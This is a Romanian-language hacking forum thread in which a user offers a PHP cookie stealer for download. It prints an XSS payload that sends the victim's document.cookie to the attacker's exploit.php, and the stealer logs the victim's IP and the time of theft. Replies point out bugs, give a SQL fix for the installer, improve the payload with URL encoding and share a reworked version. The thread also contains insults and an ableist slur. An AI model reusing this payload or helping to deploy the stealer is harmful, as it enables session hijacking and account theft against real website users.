Jump to content
shadowSQLi

[PHP]Cookie stealer [new version]

Recommended Posts

Posted (edited)

am terminat de lucrat la el.

Ce contine el/cu ce ne ajuta?

-Furtul de cookies

-IP Victim

-Data curenta cand s-a furat cookieurile

-Securizat

-Are parola la pagina de logs log.php este "shadow"

#Vector XSS:

<script>a=new Image();a.src="http://sitetau.com/exploit.php?cookie="+document.cookie;</script> 

la inceputul videoclipului aveti tutorialul de configurare si la sfarsit un test sa vedeti cum functioneaza.

#Video: https://vid.me/OckG

#Download: Zippyshare.com - s2.rar

Edited by shadowSQLi
Posted (edited)

Tot ce-ai facut tu acolo e un mare cacat, bine-nteles copy pasteuit, ai recunoscut.

1. In post specifici ca parola e rstforums dar

QrJVsLd.png

2. In install.php trebuie sa completezi cu user,pw,db etc dar mai jos vezi

mysql_select_db( 'a3797662_shadow' );

3. In install.php ai

$sql = "CREATE TABLE data2 (...........

dar tu in exploit.php si config.php ai tabelul data (in video vad ca ne pui pe noi sa modificam din data2 in data, lol????????????)

4. Codul arata ca o pula, esti analfabet, tot ce-ai "facut tu" e un mare cacat.

//Edit: @shadowSQLi cine a zis ca nu am inteles? e vorba ca ne pui pe noi sa modificam cand tu puteai sa pui direct scriptul cum trebuie. si chiar nu ma intereseaza ca esti incepator sau nu, odata ce te apuci sa faci ceva, il faci functional din toate punctele de vedere, mai ceri ajutorul altcuiva etc etc si cand gresesti nu incepi si injuri, accepti ca ai gresit, rezolvi si gata

Edited by askwrite
Posted (edited)
Tot ce-ai facut tu acolo e un mare cacat, bine-nteles copy paste-uit, ai si recunoscut.

1. In post specifici ca parola e rstforums dar

QrJVsLd.png

2. In install.php trebuie sa completezi cu user,pw,db etc dar mai jos vezi

3. In install.php ai

dar tu in exploit.php si config.php ai tabelul data (in video vad ca ne pui pe noi sa modificam din data2 in data, lol????????????)

4. Codul arata ca o pula, in concluzie e un mare cacat.

// @askwrite mai taci in plm..

sunt incepator si nu am copiat nimic doar conexiunea mysql si asta vine $servername $user $pass si verificarea de conexiune :)

Si faza care ai zis tu daca nu erai autist, intelegeai din videoclip ce trebuie modificat

Edited by shadowSQLi
Posted (edited)

Cand deschid install.php

Connected successfully

Could not create table: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM AUTO_INCREMENT=2' at line 6

Edited by webstar92
Posted
Cand deschid install.php

Connected successfully

Could not create table: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM AUTO_INCREMENT=2' at line 6

Schimba "TYPE=MyISAM AUTO_INCREMENT=2" in "ENGINE=MyISAM AUTO_INCREMENT=2"

Posted
// @askwrite mai taci in plm..

sunt incepator si nu am copiat nimic doar conexiunea mysql si asta vine $servername $user $pass si verificarea de conexiune :)

Si faza care ai zis tu daca nu erai autist, intelegeai din videoclip ce trebuie modificat

In orice domeniu daca vrei sa fii bun trebuie sa cauti critice nu laude !!

Posted

<script>a=new Image();a.src="http://sitetau.com/exploit.php?cookie="+document.cookie;</script>

ar trebui shimbat in

<script>a=new Image();a.src="http://sitetau.com/exploit.php?cookie="+encodeURIComponent(document.cookie);</script>

Posted

Daca vrei sa inveti si esti interesat, ia d-aci:

http://www74.zippyshare.com/v/OR8HnDQ7/file.html

Ti-am cosmetizaat putin scriptul cu ceva good practices. Insista pe PDO, mysql_query e mort :)

Daca ai rabdare si nu esti foarte insistent, poti sa ma intrebi ce nu intelegi.

Spor :)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...